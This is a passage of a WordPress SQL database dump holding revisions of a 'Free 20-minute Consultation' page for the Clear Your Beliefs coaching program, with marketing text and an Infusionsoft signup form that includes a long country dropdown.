Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select>\r\n\r\n</div>\r\n</div>\r\n<div style="width:47%; float:left;">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_TimeZone">Time Zone</label>\r\n\r\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Phone1">Phone Number</label>\r\n\r\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_Timetocontact">Best time to reach me by phone.</label>\r\n\r\n<input id="inf_custom_Timetocontact" class="infusion-field-input-container" name="inf_custom_Timetocontact" type="text" />\r\n\r\n</div>\r\n<div class="infusion-submit" style="margin: 50px auto;">\r\n\r\n<input type="submit" value="Submit" />\r\n\r\n</div>\r\n</form></div></div>', 'Free 20-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-revision-v1', '', '', '2014-07-04 15:50:45', '2014-07-04 20:50:45', '', 107, 'http://clearyourbeliefs.com/107-revision-v1', 0, 'revision', '', 0),
(1234, 4194, '2014-07-04 15:52:07', '2014-07-04 20:52:07', '<h1 style="text-align: center;">Free 20-minute Consultation\r\nwith a Clear Your Beliefs Coach</h1>\r\nWould you like to find out whether Clear Your Beliefs is right for you?\r\n\r\nRegister for a free 20-minute consultation with a professional <em>Clear Your Beliefs Coach</em>.  He or she will answer your questions, and give you a taste of what''s possible with our program.\r\n\r\nIn addition, we''ll send you our free multimedia eBook, "Transform Your Beliefs," as a gift.  It''s a beautiful primer on beliefs and the Clear Your Beliefs program.\r\n\r\nFill out this form to schedule your 20-minute consultation.  A Clear Your Beliefs Coach will respond to you within 72 hours.\r\n\r\nMany people find this initial consultation so valuable that they want to go deeper immediately.  After 20-minutes, your Coach will offer you the option of extending your session to a full hour, at additional cost.\r\n\r\nWe''d love to get your feedback after you have your 20-minute consultation. Please write to us at support@clearyourbeliefs.com, and let us know about your experience.\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 100%; margin: 30px auto; min-height: 500px;">\r\n<div style="width:47%; float:left;">\r\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/fce61116f5a9a85d3022cf39699950ce" method="POST"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /><input name="inf_form_name" type="hidden" value="CYB 20 min free consult w/ Ebook" /><input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_City"> City</label>\r\n\r\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_State"> State</label>\r\n\r\n<input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Country"> Country</label>\r\n\r\n<select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select>\r\n\r\n</div>\r\n</div>\r\n<div style="width:47%; float:left;">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_TimeZone">Time Zone</label>\r\n\r\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Phone1">Phone Number</label>\r\n\r\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_Timetocontact">Best time to reach me by phone.</label>\r\n\r\n<input id="inf_custom_Timetocontact" class="infusion-field-input-container" name="inf_custom_Timetocontact" type="text" />\r\n\r\n</div>\r\n<div class="infusion-submit" style="margin: 100px auto;float:right;">\r\n\r\n<input type="submit" value="Submit" />\r\n\r\n</div>\r\n</form></div></div>', 'Free 20-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-revision-v1', '', '', '2014-07-04 15:52:07', '2014-07-04 20:52:07', '', 107, 'http://clearyourbeliefs.com/107-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1235, 4194, '2014-07-04 15:59:22', '2014-07-04 20:59:22', '<h1 style="text-align: center;">Free 20-minute Consultation\r\nwith a Clear Your Beliefs Coach</h1>\r\nWould you like to find out whether Clear Your Beliefs is right for you?\r\n\r\nRegister for a free 20-minute consultation with a professional <em>Clear Your Beliefs Coach</em>.  He or she will answer your questions, and give you a taste of what''s possible with our program.\r\n\r\nIn addition, we''ll send you our free multimedia eBook, "Transform Your Beliefs," as a gift.  It''s a beautiful primer on beliefs and the Clear Your Beliefs program.\r\n\r\nFill out this form to schedule your 20-minute consultation.  A Clear Your Beliefs Coach will respond to you within 72 hours.\r\n\r\nMany people find this initial consultation so valuable that they want to go deeper immediately.  After 20-minutes, your Coach will offer you the option of extending your session to a full hour, at additional cost.\r\n\r\nWe''d love to get your feedback after you have your 20-minute consultation. Please write to us at support@clearyourbeliefs.com, and let us know about your experience.\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 100%; margin: 30px auto; min-height: 500px;">\r\n<div style="width:47%; float:left;">\r\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/fce61116f5a9a85d3022cf39699950ce" method="POST"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /><input name="inf_form_name" type="hidden" value="CYB 20 min free consult w/ Ebook" /><input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_City"> City</label>\r\n\r\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_State"> State</label>\r\n\r\n<input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Country"> Country</label>\r\n\r\n<select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option 